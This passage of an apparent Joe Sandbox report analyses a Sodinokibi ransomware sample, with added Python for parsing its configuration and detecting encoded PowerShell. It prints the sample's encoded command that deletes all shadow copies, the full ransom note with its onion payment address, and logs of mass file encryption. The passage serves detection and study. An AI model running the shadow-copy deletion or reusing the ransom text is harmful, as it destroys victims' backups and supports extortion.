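                "tor browser", "boot"],
    },
    "img": "LQAtAC0APQA9AD0AIABTAG8AZABpAG4AbwBrAGkAYgBpACAAUgBhAG4AcwBvAG0AdwBhAHIAZQAgAD0APQA9AC0ALQAtAA0ACgANAAoAQQBsAGwAIABvAGYAIAB5AG8AdQByACAAZgBpAGwAZQBzACAAYQByAGUAIABlAG4AYwByAHkAcAB0AGUAZAAhAA0ACgANAAoARgBpAG4AZAAgAHsARQBYAFQAfQAtAHIAZQBhAGQAbQBlAC4AdAB4AHQAIABhAG4AZAAgAGYAbwBsAGwAbwB3ACAAaQBuAHMAdAB1AGMAdABpAG8AbgBzAAAA",
    "wipe": False,
    "wfld": ["backup"],
    "nname": "{EXT}-readme.txt",
    "pk": "jButbpNlvoIWVhEICJ6yN2fkJtSPEPAeh/Pbds99MC0=",
    "net": True,
}


def wallpaper_text(cfg: Dict = CONFIG) -> str:
    """'img' is base64 over UTF-16LE text; the trailing NUL is the C string
    terminator stored with it, not part of the message."""
    return base64.b64decode(cfg["img"]).decode("utf-16-le").rstrip("\x00")


def public_key(cfg: Dict = CONFIG) -> bytes:
    """'pk' is plain base64.  32 bytes is consistent with a Curve25519 public
    key (assumption: the report does not state the algorithm)."""
    return base64.b64decode(cfg["pk"])


def ransom_note_name(ext: str, cfg: Dict = CONFIG) -> str:
    """'nname' carries a {EXT} placeholder for the per-victim extension."""
    return cfg["nname"].replace("{EXT}", ext)


def services_to_stop(running: List[str], cfg: Dict = CONFIG) -> List[str]:
    """Assumed semantics: a running service is targeted when its name contains
    any 'svc' entry, compared case-insensitively."""
    terms = [t.lower() for t in cfg["svc"]]
    return [s for s in running if any(t in s.lower() for t in terms)]


def classify_path(path: str, cfg: Dict = CONFIG) -> str:
    """Return 'skip', 'wipe' or 'encrypt' for a Windows path.

    Assumed semantics: 'fld' and 'wfld' match any directory component, 'fls'
    the file name and 'ext' the extension without its dot, all case-
    insensitively.  'wfld' only matters when 'wipe' is set, which it is not
    in this configuration, so a 'backup' folder is simply encrypted here."""
    p = PureWindowsPath(path)
    dirs = [part.lower() for part in p.parts[1:-1]]   # drop drive and file name
    name = p.name.lower()
    ext = p.suffix.lower().lstrip(".")
    wht = cfg["wht"]
    if any(d in wht["fld"] for d in dirs):
        return "skip"
    if name in wht["fls"] or ext in wht["ext"]:
        return "skip"
    if cfg["wipe"] and any(d in cfg["wfld"] for d in dirs):
        return "wipe"
    return "encrypt"


if __name__ == "__main__":
    print(wallpaper_text())
    print(len(public_key()), "byte public key")
    # Constructed sample inputs, not taken from the report.
    print(services_to_stop(["SQLSERVERAGENT", "VeeamBackupSvc", "Spooler", "VSS"]))
    for sample in [r"C:\Windows\System32\kernel32.dll",
                   r"C:\Users\user\Documents\report.docx",
                   r"D:\Backup\db.bak"]:
        print(sample, "->", classify_path(sample))
```

The "ext" whitelist is worth reading as a defender: everything the operating system needs to boot and everything the ransomware itself needs to run (exe, dll, sys, bat, ps1, msi) is excluded, while the extensions users care about are left to be encrypted; and "wipe": false means the "backup" entry in "wfld" is dormant in this build even though it is carried in the configuration.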

Yara Overview

Memory Dumps

Source | Rule | Description | Author
00000000.00000003.431838459.000000000259F000.00000004.00000040.sdmp | JoeSecurity_Sodinokibi | Yara detected Sodinokibi Ransomware | Joe Security
00000000.00000003.431690930.000000000259F000.00000004.00000040.sdmp | JoeSecurity_Sodinokibi | Yara detected Sodinokibi Ransomware | Joe Security
Process Memory Space: zA1pLzHWuQ.exe PID: 1496 | JoeSecurity_Sodinokibi | Yara detected Sodinokibi Ransomware | Joe Security

Sigma Overview

System Summary:

Sigma detected: Delete Shadow Copy Via Powershell
Source: Process started
Author: Joe Security
Data:
  Command: powershell -e RwBlAHQALQBXAG0AaQBPAGIAagBlAGMAdAAgAFcAaQBuADMAMgBfAFMAaABhAGQAbwB3AGMAbwBwAHkAIAB8ACAARgBvAHIARQBhAGMAaAAtAE8AYgBqAGUAYwB0ACAAewAkAF8ALgBEAGUAbABlAHQAZQAoACkAOwB9AA==
  CommandLine: powershell -e RwBlAHQALQBXAG0AaQBPAGIAagBlAGMAdAAgAFcAaQBuADMAMgBfAFMAaABhAGQAbwB3AGMAbwBwAHkAIAB8ACAARgBvAHIARQBhAGMAaAAtAE8AYgBqAGUAYwB0ACAAewAkAF8ALgBEAGUAbABlAHQAZQAoACkAOwB9AA==
  CommandLine|base64offset|contains: ^
  Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  ParentCommandLine: 'C:\Users\user\Desktop\zA1pLzHWuQ.exe'
  ParentImage: C:\Users\user\Desktop\zA1pLzHWuQ.exe
  ParentProcessId: 1496
  ProcessCommandLine: powershell -e RwBlAHQALQBXAG0AaQBPAGIAagBlAGMAdAAgAFcAaQBuADMAMgBfAFMAaABhAGQAbwB3AGMAbwBwAHkAIAB8ACAARgBvAHIARQBhAGMAaAAtAE8AYgBqAGUAYwB0ACAAewAkAF8ALgBEAGUAbABlAHQAZQAoACkAOwB9AA==
  ProcessId: 1696
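
The encoded command line in the process tree and the Sigma hit above concern the same base64 blob. The following Python is an added example, not part of the Joe Sandbox report and not Joe Security's rule: it decodes a PowerShell -EncodedCommand argument (base64 over the UTF-16LE text of the script) and shows how a base64offset-style match, the modifier named in the "CommandLine|base64offset|contains" field above, finds a plaintext needle inside the blob without decoding it. The flag spellings accepted by the regex, the needle list (Win32_Shadowcopy and .Delete()) and the benign Get-Date command line used as a negative case are my assumptions; the report shows that the rule fired on this command line, not the rule's own strings.

```python
"""Decode a PowerShell -EncodedCommand argument and match it the way a
Sigma base64offset modifier does.  Added example, not Joe Sandbox code."""
import base64
import re
from typing import List, Optional

# Command line of PID 1696 as captured in the report's process tree.
OBSERVED_CMDLINE = (
    "powershell -e "
    "RwBlAHQALQBXAG0AaQBPAGIAagBlAGMAdAAgAFcAaQBuADMAMgBfAFMAaABhAGQAbwB3AGMAbwBwAHkAIAB8ACAARgBvAHIARQBhAGMAaAAtAE8AYgBqAGUAYwB0ACAAewAkAF8ALgBEAGUAbABlAHQAZQAoACkAOwB9AA=="
)

# PowerShell accepts any unambiguous prefix of -EncodedCommand; these are the
# spellings seen in practice (assumption: extend the alternation if needed).
ENCODED_FLAG = re.compile(
    r"(?:^|\s)-(?:e|ec|en|enc|encodedcommand)\s+([A-Za-z0-9+/=]+)", re.IGNORECASE
)


def decode_encoded_command(cmdline: str) -> Optional[str]:
    """Return the script behind -e/-enc/-EncodedCommand, or None if absent.
    PowerShell expects base64 over the UTF-16LE bytes of the script text."""
    match = ENCODED_FLAG.search(cmdline)
    if match is None:
        return None
    raw = base64.b64decode(match.group(1), validate=True)
    return raw.decode("utf-16-le")


def encode_command(script: str) -> str:
    """Inverse of the above; used to build test inputs."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")


def base64offset_variants(needle: bytes) -> List[str]:
    """The three substrings that cover every alignment of `needle` inside a
    base64 stream.  Prepend 0, 1 or 2 filler bytes, encode, then cut away
    the leading and trailing characters whose bits also depend on the
    unknown neighbouring bytes."""
    start_cut = (0, 2, 3)
    end_cut = (None, -3, -2)
    variants = []
    for i in range(3):
        enc = base64.b64encode(b" " * i + needle).decode("ascii")
        variants.append(enc[start_cut[i]:end_cut[(len(needle) + i) % 3]])
    return variants


def base64offset_contains(haystack: str, value: str) -> bool:
    """CommandLine|base64offset|contains, with the value encoded as UTF-16LE
    because that is the encoding under -EncodedCommand.  The match is case-
    and encoding-sensitive: "win32_shadowcopy" in lower case, or the same
    text under a different encoding, produces different base64."""
    needle = value.encode("utf-16-le")
    return any(v in haystack for v in base64offset_variants(needle))


SHADOW_COPY_NEEDLES = ["Win32_Shadowcopy", ".Delete()"]   # assumption


def flags_shadow_copy_deletion(cmdline: str) -> bool:
    """True when every needle is present either in clear text or inside the
    encoded argument.  Decoding first (decode_encoded_command) is the more
    robust path; the base64offset check is what a log-only rule can do."""
    return all(
        needle.lower() in cmdline.lower() or base64offset_contains(cmdline, needle)
        for needle in SHADOW_COPY_NEEDLES
    )


if __name__ == "__main__":
    print(decode_encoded_command(OBSERVED_CMDLINE))
    print(flags_shadow_copy_deletion(OBSERVED_CMDLINE))
```

The decoded script, Get-WmiObject Win32_Shadowcopy | ForEach-Object {$_.Delete();}, also explains the unsecapp.exe -Embedding process in the tree: it is the WMI callback host that Get-WmiObject brings up, so a PowerShell child of an unsigned executable followed by unsecapp.exe is a lineage worth alerting on even before the command line is decoded.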

Signature Overview

AV Detection:

Antivirus / Scanner detection for submitted sample
Source: zA1pLzHWuQ.exe; Avira: detected
Found malware configuration
Source: zA1pLzHWuQ.exe.1496.0.memstr; Malware Configuration Extractor: Sodinokibi (the extracted configuration is reproduced in full in the Malware Configuration section above)
Multi AV Scanner detection for submitted file
Source: zA1pLzHWuQ.exe; Virustotal: Detection: 68%
Source: zA1pLzHWuQ.exe; ReversingLabs: Detection: 81%
Machine Learning detection for sample
Source: zA1pLzHWuQ.exe; Joe Sandbox ML: detected

Source: C:\Users\user\Desktop\zA1pLzHWuQ.exe; Code function: 0_2_00B95086 CryptAcquireContextW,CryptGenRandom
Source: C:\Users\user\Desktop\zA1pLzHWuQ.exe; Code function: 0_2_00B959CD CryptBinaryToStringW,CryptBinaryToStringW
Source: C:\Users\user\Desktop\zA1pLzHWuQ.exe; Code function: 0_2_00B9596C CryptStringToBinaryW,CryptStringToBinaryW

Checks for available system drives (often done to infect USB drives)
Source: C:\Users\user\Desktop\zA1pLzHWuQ.exe; File opened: z:
Source: C:\Users\user\Desktop\zA1pLzHWuQ.exe; File opened: x:
Source: C:\Users\user\Desktop\zA1pLzHWuQ.exe; File opened: v:
Source: C:\Users\user\Desktop\zA1pLzHWuQ.exe; File opened: t:
Source: C:\Users\user\Desktop\zA1pLzHWuQ.exe; File opened: r:
Source: C:\Users\user\Desktop\zA1pLzHWuQ.exe; File opened: p:
Source: C:\Users\user\Desktop\zA1pLzHWuQ.exe; File opened: n:
Source: C:\Users\user\Desktop\zA1pLzHWuQ.exe; File opened: l:
Source: C:\Users\user\Desktop\zA1pLzHWuQ.exe; File opened: j:
Source: C:\Users\user\Desktop\zA1pLzHWuQ.exe; File opened: h:
Source: C:\Users\user\Desktop\zA1pLzHWuQ.exe; File opened: f:
Source: C:\Users\user\Desktop\zA1pLzHWuQ.exe; File opened: b:
Source: C:\Users\user\Desktop\zA1pLzHWuQ.exe; File opened: y:
Source: C:\Users\user\Desktop\zA1pLzHWuQ.exe; File opened: w:
Source: C:\Users\user\Desktop\zA1pLzHWuQ.exe; File opened: u:
Source: C:\Users\user\Desktop\zA1pLzHWuQ.exe; File opened: s:
Source: C:\Users\user\Desktop\zA1pLzHWuQ.exe; File opened: q:
Source: C:\Users\user\Desktop\zA1pLzHWuQ.exe; File opened: o:
Source: C:\Users\user\Desktop\zA1pLzHWuQ.exe; File opened: m:
Source: C:\Users\user\Desktop\zA1pLzHWuQ.exe; File opened: k:
Source: C:\Users\user\Desktop\zA1pLzHWuQ.exe; File opened: i:
Source: C:\Users\user\Desktop\zA1pLzHWuQ.exe; File opened: g:
Source: C:\Users\user\Desktop\zA1pLzHWuQ.exe; File opened: e:
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; File opened: c:
Source: C:\Users\user\Desktop\zA1pLzHWuQ.exe; File opened: a:

Source: C:\Users\user\Desktop\zA1pLzHWuQ.exe; Code function: 0_2_00B970C1 FindFirstFileExW,FindFirstFileW,FindNextFileW,FindClose

        Networking:

        Found Tor onion address
        Source: zA1pLzHWuQ.exe, 00000000.00000002.881692866.00000000025A8000.00000004.00000040.sdmp String found in binary or memory: b) Open our website: http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/EA8A4E1A755EAA5C
        Source: zA1pLzHWuQ.exe, 00000000.00000003.431707239.00000000025A8000.00000004.00000040.sdmp String found in binary or memory: b) Open our website: http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/{UID}
        Source: 356kf7c535-readme.txt196.0.dr String found in binary or memory: b) Open our website: http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/EA8A4E1A755EAA5C
        Source: zA1pLzHWuQ.exe, 00000000.00000003.431707239.00000000025A8000.00000004.00000040.sdmp String found in binary or memory: http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/
        Source: zA1pLzHWuQ.exe, 00000000.00000002.881692866.00000000025A8000.00000004.00000040.sdmp, 356kf7c535-readme.txt196.0.dr String found in binary or memory: http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/EA8A4E1A755EAA5C
        Source: zA1pLzHWuQ.exe, 00000000.00000003.431707239.00000000025A8000.00000004.00000040.sdmp String found in binary or memory: http://decryptor.cc/
        Source: zA1pLzHWuQ.exe, 00000000.00000002.881692866.00000000025A8000.00000004.00000040.sdmp, 356kf7c535-readme.txt196.0.dr String found in binary or memory: http://decryptor.cc/EA8A4E1A755EAA5C
        Source: zA1pLzHWuQ.exe, 00000000.00000002.881692866.00000000025A8000.00000004.00000040.sdmp, 356kf7c535-readme.txt196.0.dr String found in binary or memory: https://filehippo.com/download_tor_browser_for_windows/
        Source: zA1pLzHWuQ.exe, 00000000.00000002.881692866.00000000025A8000.00000004.00000040.sdmp, 356kf7c535-readme.txt196.0.dr String found in binary or memory: https://torproject.org/
        Source: zA1pLzHWuQ.exe, 00000000.00000003.704743407.00000000025B1000.00000004.00000040.sdmp, 356kf7c535-readme.txt196.0.dr String found in binary or memory: https://www.coveware.com/blog/2019/7/15/ransomware-amounts-rise-3x-in-q2-as-ryuk-amp-sodinokibi-spre

        Spam, unwanted Advertisements and Ransom Demands:

        Found ransom note / readme
        Source: C:\356kf7c535-readme.txt Dropped file: ---=== Welcome. Again. ===---[+] Whats Happen? [+]Your files are encrypted, and currently unavailable. You can check it: all files on your computer has extension 356kf7c535.By the way, everything is possible to recover (restore), but you need to follow our instructions. Otherwise, you cant return your data (NEVER).[+] What guarantees? [+]Its just a business. We absolutely do not care about you and your deals, except getting benefits. If we do not do our work and liabilities - nobody will not cooperate with us. Its not in our interests.To check the ability of returning files, You should go to our website. There you can decrypt one file for free. That is our guarantee.If you will not cooperate with our service - for us, its does not matter. But you will lose your time and data, cause just we have the private key. In practise - time is much more valuable than money.I suggest you read about us on the Internet, we are known as "Sodinokibi Ransomware". For example, this article:https://www.coveware.com/blog/2019/7/15/ransomware-amounts-rise-3x-in-q2-as-ryuk-amp-sodinokibi-spreadPay attention to that:"How Much Data Is Decrypted with a Ransomware Decryptor?In Q2 2019, victims who paid for a decryptor recovered 92% of their encrypted data. This statistic varied dramatically depending on the ransomware type. For example, Ryuk ransomware has a relatively low data recovery rate, at ~ 87%, while Sodinokibi was close to 100%. "Now you have a guaran
        Yara detected Sodinokibi Ransomware
        Source: Yara match File source: 00000000.00000003.431838459.000000000259F000.00000004.00000040.sdmp, type: MEMORY
        Source: Yara match File source: 00000000.00000003.431690930.000000000259F000.00000004.00000040.sdmp, type: MEMORY
        Source: Yara match File source: Process Memory Space: zA1pLzHWuQ.exe PID: 1496, type: MEMORY
        Contains functionality to change the wallpaper
        Source: C:\Users\user\Desktop\zA1pLzHWuQ.exe Code function: 0_2_00B9419B GetDC,CreateCompatibleDC,GetDeviceCaps,GetDeviceCaps,CreateCompatibleBitmap,SelectObject,GetDeviceCaps,MulDiv,CreateFontW,SelectObject,SetBkMode,SetTextColor,GetStockObject,FillRect,SetPixel,DrawTextW,SystemParametersInfoW,DeleteObject,DeleteObject,DeleteDC,ReleaseDC, 0_2_00B9419B
        Modifies existing user documents (likely ransomware behavior)
        Source: C:\Users\user\Desktop\zA1pLzHWuQ.exe File moved: C:\Users\user\Desktop\JSDNGYCOWY.docx
        Source: C:\Users\user\Desktop\zA1pLzHWuQ.exe File deleted: C:\Users\user\Desktop\JSDNGYCOWY.docx
        Source: C:\Users\user\Desktop\zA1pLzHWuQ.exe File moved: C:\Users\user\Desktop\ZBEDCJPBEY.pdf
        Source: C:\Users\user\Desktop\zA1pLzHWuQ.exe File deleted: C:\Users\user\Desktop\ZBEDCJPBEY.pdf
        Source: C:\Users\user\Desktop\zA1pLzHWuQ.exe File moved: C:\Users\user\Desktop\NIKHQAIQAU.xlsx
        Writes a notice file (html or txt) to demand a ransom
        Source: C:\Users\user\Desktop\zA1pLzHWuQ.exe File dropped: C:\356kf7c535-readme.txt -> decrypt one file for free. that is our guarantee.if you will not cooperate with our service - for us, its does not matter. but you will lose your time and data, cause just we have the private key. in practise - time is much more valuable than money.i suggest you read about us on the internet, we are known as "sodinokibi ransomware". for example, this article:https://www.coveware.com/blog/2019/7/15/ransomware-amounts-rise-3x-in-q2-as-ryuk-amp-sodinokibi-spreadpay attention to that:"how much data is decrypted with a ransomware decryptor?in q2 2019, victims who paid for a decryptor recovered 92% of their encrypted data. this statistic varied dramatically depending on the ransomware type. for example, ryuk ransomware has a relatively low data recovery rate, at ~ 87%, while sodinokibi was close to 100%. "now you have a guarantee that your files will be returned 100 %.[+] how to get access on website? [+]you have two ways:1) [recommended] using a tor browser! a) download and ins
        Source: C:\Users\user\Desktop\zA1pLzHWuQ.exe File dropped: C:\Program Files\356kf7c535-readme.txt -> decrypt one file for free. that is our guarantee.if you will not cooperate with our service - for us, its does not matter. but you will lose your time and data, cause just we have the private key. in practise - time is much more valuable than money.i suggest you read about us on the internet, we are known as "sodinokibi ransomware". for example, this article:https://www.coveware.com/blog/2019/7/15/ransomware-amounts-rise-3x-in-q2-as-ryuk-amp-sodinokibi-spreadpay attention to that:"how much data is decrypted with a ransomware decryptor?in q2 2019, victims who paid for a decryptor recovered 92% of their encrypted data. this statistic varied dramatically depending on the ransomware type. for example, ryuk ransomware has a relatively low data recovery rate, at ~ 87%, while sodinokibi was close to 100%. "now you have a guarantee that your files will be returned 100 %.[+] how to get access on website? [+]you have two ways:1) [recommended] using a tor browser! a) download and ins
        Source: C:\Users\user\Desktop\zA1pLzHWuQ.exe File dropped: C:\Program Files (x86)\356kf7c535-readme.txt -> decrypt one file for free. that is our guarantee.if you will not cooperate with our service - for us, its does not matter. but you will lose your time and data, cause just we have the private key. in practise - time is much more valuable than money.i suggest you read about us on the internet, we are known as "sodinokibi ransomware". for example, this article:https://www.coveware.com/blog/2019/7/15/ransomware-amounts-rise-3x-in-q2-as-ryuk-amp-sodinokibi-spreadpay attention to that:"how much data is decrypted with a ransomware decryptor?in q2 2019, victims who paid for a decryptor recovered 92% of their encrypted data. this statistic varied dramatically depending on the ransomware type. for example, ryuk ransomware has a relatively low data recovery rate, at ~ 87%, while sodinokibi was close to 100%. "now you have a guarantee that your files will be returned 100 %.[+] how to get access on website? [+]you have two ways:1) [recommended] using a tor browser! a) download and ins
        Source: C:\Users\user\Desktop\zA1pLzHWuQ.exe File dropped: C:\ProgramData\356kf7c535-readme.txt -> decrypt one file for free. that is our guarantee.if you will not cooperate with our service - for us, its does not matter. but you will lose your time and data, cause just we have the private key. in practise - time is much more valuable than money.i suggest you read about us on the internet, we are known as "sodinokibi ransomware". for example, this article:https://www.coveware.com/blog/2019/7/15/ransomware-amounts-rise-3x-in-q2-as-ryuk-amp-sodinokibi-spreadpay attention to that:"how much data is decrypted with a ransomware decryptor?in q2 2019, victims who paid for a decryptor recovered 92% of their encrypted data. this statistic varied dramatically depending on the ransomware type. for example, ryuk ransomware has a relatively low data recovery rate, at ~ 87%, while sodinokibi was close to 100%. "now you have a guarantee that your files will be returned 100 %.[+] how to get access on website? [+]you have two ways:1) [recommended] using a tor browser! a) download and ins
        Source: C:\Users\user\Desktop\zA1pLzHWuQ.exe File dropped: C:\Recovery\356kf7c535-readme.txt -> decrypt one file for free. that is our guarantee.if you will not cooperate with our service - for us, its does not matter. but you will lose your time and data, cause just we have the private key. in practise - time is much more valuable than money.i suggest you read about us on the internet, we are known as "sodinokibi ransomware". for example, this article:https://www.coveware.com/blog/2019/7/15/ransomware-amounts-rise-3x-in-q2-as-ryuk-amp-sodinokibi-spreadpay attention to that:"how much data is decrypted with a ransomware decryptor?in q2 2019, victims who paid for a decryptor recovered 92% of their encrypted data. this statistic varied dramatically depending on the ransomware type. for example, ryuk ransomware has a relatively low data recovery rate, at ~ 87%, while sodinokibi was close to 100%. "now you have a guarantee that your files will be returned 100 %.[+] how to get access on website? [+]you have two ways:1) [recommended] using a tor browser! a) download and ins
        Source: C:\Users\user\Desktop\zA1pLzHWuQ.exe File dropped: C:\Users\356kf7c535-readme.txt -> decrypt one file for free. that is our guarantee.if you will not cooperate with our service - for us, its does not matter. but you will lose your time and data, cause just we have the private key. in practise - time is much more valuable than money.i suggest you read about us on the internet, we are known as "sodinokibi ransomware". for example, this article:https://www.coveware.com/blog/2019/7/15/ransomware-amounts-rise-3x-in-q2-as-ryuk-amp-sodinokibi-spreadpay attention to that:"how much data is decrypted with a ransomware decryptor?in q2 2019, victims who paid for a decryptor recovered 92% of their encrypted data. this statistic varied dramatically depending on the ransomware type. for example, ryuk ransomware has a relatively low data recovery rate, at ~ 87%, while sodinokibi was close to 100%. "now you have a guarantee that your files will be returned 100 %.[+] how to get access on website? [+]you have two ways:1) [recommended] using a tor browser! a) download and ins
        Source: C:\Users\user\Desktop\zA1pLzHWuQ.exe File dropped: C:\ProgramData\Adobe\356kf7c535-readme.txt -> decrypt one file for free. that is our guarantee.if you will not cooperate with our service - for us, its does not matter. but you will lose your time and data, cause just we have the private key. in practise - time is much more valuable than money.i suggest you read about us on the internet, we are known as "sodinokibi ransomware". for example, this article:https://www.coveware.com/blog/2019/7/15/ransomware-amounts-rise-3x-in-q2-as-ryuk-amp-sodinokibi-spreadpay attention to that:"how much data is decrypted with a ransomware decryptor?in q2 2019, victims who paid for a decryptor recovered 92% of their encrypted data. this statistic varied dramatically depending on the ransomware type. for example, ryuk ransomware has a relatively low data recovery rate, at ~ 87%, while sodinokibi was close to 100%. "now you have a guarantee that your files will be returned 100 %.[+] how to get access on website? [+]you have two ways:1) [recommended] using a tor browser! a) download and ins
        Source: C:\Users\user\Desktop\zA1pLzHWuQ.exe File dropped: C:\ProgramData\dbg\356kf7c535-readme.txt -> decrypt one file for free. that is our guarantee.if you will not cooperate with our service - for us, its does not matter. but you will lose your time and data, cause just we have the private key. in practise - time is much more valuable than money.i suggest you read about us on the internet, we are known as "sodinokibi ransomware". for example, this article:https://www.coveware.com/blog/2019/7/15/ransomware-amounts-rise-3x-in-q2-as-ryuk-amp-sodinokibi-spreadpay attention to that:"how much data is decrypted with a ransomware decryptor?in q2 2019, victims who paid for a decryptor recovered 92% of their encrypted data. this statistic varied dramatically depending on the ransomware type. for example, ryuk ransomware has a relatively low data recovery rate, at ~ 87%, while sodinokibi was close to 100%. "now you have a guarantee that your files will be returned 100 %.[+] how to get access on website? [+]you have two ways:1) [recommended] using a tor browser! a) download and ins
        Source: C:\Users\user\Desktop\zA1pLzHWuQ.exe File dropped: C:\ProgramData\Microsoft\356kf7c535-readme.txt -> decrypt one file for free. that is our guarantee.if you will not cooperate with our service - for us, its does not matter. but you will lose your time and data, cause just we have the private key. in practise - time is much more valuable than money.i suggest you read about us on the internet, we are known as "sodinokibi ransomware". for example, this article:https://www.coveware.com/blog/2019/7/15/ransomware-amounts-rise-3x-in-q2-as-ryuk-amp-sodinokibi-spreadpay attention to that:"how much data is decrypted with a ransomware decryptor?in q2 2019, victims who paid for a decryptor recovered 92% of their encrypted data. this statistic varied dramatically depending on the ransomware type. for example, ryuk ransomware has a relatively low data recovery rate, at ~ 87%, while sodinokibi was close to 100%. "now you have a guarantee that your files will be returned 100 %.[+] how to get access on website? [+]you have two ways:1) [recommended] using a tor browser! a) download and ins
        Source: C:\Users\user\Desktop\zA1pLzHWuQ.exe File dropped: C:\ProgramData\Microsoft OneDrive\356kf7c535-readme.txt -> decrypt one file for free. that is our guarantee.if you will not cooperate with our service - for us, its does not matter. but you will lose your time and data, cause just we have the private key. in practise - time is much more valuable than money.i suggest you read about us on the internet, we are known as "sodinokibi ransomware". for example, this article:https://www.coveware.com/blog/2019/7/15/ransomware-amounts-rise-3x-in-q2-as-ryuk-amp-sodinokibi-spreadpay attention to that:"how much data is decrypted with a ransomware decryptor?in q2 2019, victims who paid for a decryptor recovered 92% of their encrypted data. this statistic varied dramatically depending on the ransomware type. for example, ryuk ransomware has a relatively low data recovery rate, at ~ 87%, while sodinokibi was close to 100%. "now you have a guarantee that your files will be returned 100 %.[+] how to get access on website? [+]you have two ways:1) [recommended] using a tor browser! a) download and ins
        Writes many files with high entropy
        Source: C:\Users\user\Desktop\zA1pLzHWuQ.exe File created: C:\Users\Default\NTUSER.DAT.LOG1 entropy: 7.99656633962
        Source: C:\Users\user\Desktop\zA1pLzHWuQ.exe File created: C:\Users\Default\NTUSER.DAT{8ebe95f7-3dcb-11e8-a9d9-7cfe90913f50}.TM.blf entropy: 7.99742486083
        Source: C:\Users\user\Desktop\zA1pLzHWuQ.exe File created: C:\Users\Default\NTUSER.DAT{8ebe95f7-3dcb-11e8-a9d9-7cfe90913f50}.TMContainer00000000000000000001.regtrans-ms entropy: 7.99965136218
        Source: C:\Users\user\Desktop\zA1pLzHWuQ.exe File created: C:\Users\Default\NTUSER.DAT{8ebe95f7-3dcb-11e8-a9d9-7cfe90913f50}.TMContainer00000000000000000002.regtrans-ms entropy: 7.9996329992
        Source: C:\Users\user\Desktop\zA1pLzHWuQ.exe File created: C:\ProgramData\Microsoft\Diagnosis\EventStore.db entropy: 7.99732174792
        Source: C:\Users\user\Desktop\zA1pLzHWuQ.exe File created: C:\ProgramData\Microsoft\Storage Health\StorageHealthModel.dat entropy: 7.99963499737
        Source: C:\Users\user\Desktop\zA1pLzHWuQ.exe File created: C:\ProgramData\Microsoft\User Account Pictures\guest.bmp entropy: 7.99969803071
        Source: C:\Users\user\Desktop\zA1pLzHWuQ.exe File created: C:\ProgramData\Microsoft\User Account Pictures\user.bmp entropy: 7.99970625949
        Source: C:\Users\user\Desktop\zA1pLzHWuQ.exe File created: C:\ProgramData\USOShared\Logs\NotificationUxBroker.001.etl entropy: 7.99310967148
        Source: C:\Users\user\Desktop\zA1pLzHWuQ.exe File created: C:\ProgramData\USOShared\Logs\NotifyIcon.011.etl entropy: 7.99603514087
        Source: C:\Users\user\Desktop\zA1pLzHWuQ.exe File created: C:\ProgramData\USOShared\Logs\UpdateSessionOrchestration.007.etl entropy: 7.99600929381
        Source: C:\Users\user\Desktop\zA1pLzHWuQ.exe File created: C:\ProgramData\USOShared\Logs\UpdateSessionOrchestration.008.etl entropy: 7.99128872034
        Source: C:\Users\user\Desktop\zA1pLzHWuQ.exe File created: C:\ProgramData\USOShared\Logs\UpdateSessionOrchestration.015.etl entropy: 7.99318181537
        Source: C:\Users\user\Desktop\zA1pLzHWuQ.exe File created: C:\ProgramData\USOShared\Logs\UpdateSessionOrchestration.016.etl entropy: 7.99092777671
        Source: C:\Users\user\Desktop\zA1pLzHWuQ.exe File created: C:\ProgramData\USOShared\Logs\UpdateSessionOrchestration.021.etl entropy: 7.99762234173
        Source: C:\Users\user\Desktop\zA1pLzHWuQ.exe File created: C:\ProgramData\Microsoft\ClickToRun\{9AC08E99-230B-47e8-9721-4577B7F124EA}\AirSpace.Etw.man entropy: 7.99961948165
        Source: C:\Users\user\Desktop\zA1pLzHWuQ.exe File created: C:\ProgramData\Microsoft\ClickToRun\{9AC08E99-230B-47e8-9721-4577B7F124EA}\C2RManifest.Excel.Excel.x-none.msi.16.x-none.xml entropy: 7.99962755606
        Source: C:\Users\user\Desktop\zA1pLzHWuQ.exe File created: C:\ProgramData\Microsoft\ClickToRun\{9AC08E99-230B-47e8-9721-4577B7F124EA}\C2RManifest.excelmui.msi.16.en-us.xml entropy: 7.9952828081
        Source: C:\Users\user\Desktop\zA1pLzHWuQ.exe File created: C:\ProgramData\Microsoft\ClickToRun\{9AC08E99-230B-47e8-9721-4577B7F124EA}\C2RManifest.office64ww.msi.16.x-none.xml entropy: 7.99927283874
        Source: C:\Users\user\Desktop\zA1pLzHWuQ.exe File created: C:\ProgramData\Microsoft\ClickToRun\{9AC08E99-230B-47e8-9721-4577B7F124EA}\C2RManifest.officemui.msi.16.en-us.xml entropy: 7.99832451919
        Source: C:\Users\user\Desktop\zA1pLzHWuQ.exe File created: C:\ProgramData\Microsoft\ClickToRun\{9AC08E99-230B-47e8-9721-4577B7F124EA}\C2RManifest.OneNote.OneNote.x-none.msi.16.x-none.xml entropy: 7.99790126791
        Source: C:\Users\user\Desktop\zA1pLzHWuQ.exe File created: C:\ProgramData\Microsoft\ClickToRun\{9AC08E99-230B-47e8-9721-4577B7F124EA}\C2RManifest.Outlook.Outlook.x-none.msi.16.x-none.xml entropy: 7.99799031793
        Source: C:\Users\user\Desktop\zA1pLzHWuQ.exe File created: C:\ProgramData\Microsoft\ClickToRun\{9AC08E99-230B-47e8-9721-4577B7F124EA}\C2RManifest.outlookmui.msi.16.en-us.xml entropy: 7.99807034562
        Source: C:\Users\user\Desktop\zA1pLzHWuQ.exe File created: C:\ProgramData\Microsoft\ClickToRun\{9AC08E99-230B-47e8-9721-4577B7F124EA}\C2RManifest.PowerPoint.PowerPoint.x-none.msi.16.x-none.xml entropy: 7.99820717495
        Source: C:\Users\user\Desktop\zA1pLzHWuQ.exe File created: C:\ProgramData\Microsoft\ClickToRun\{9AC08E99-230B-47e8-9721-4577B7F124EA}\C2RManifest.powerpointmui.msi.16.en-us.xml entropy: 7.99355492829
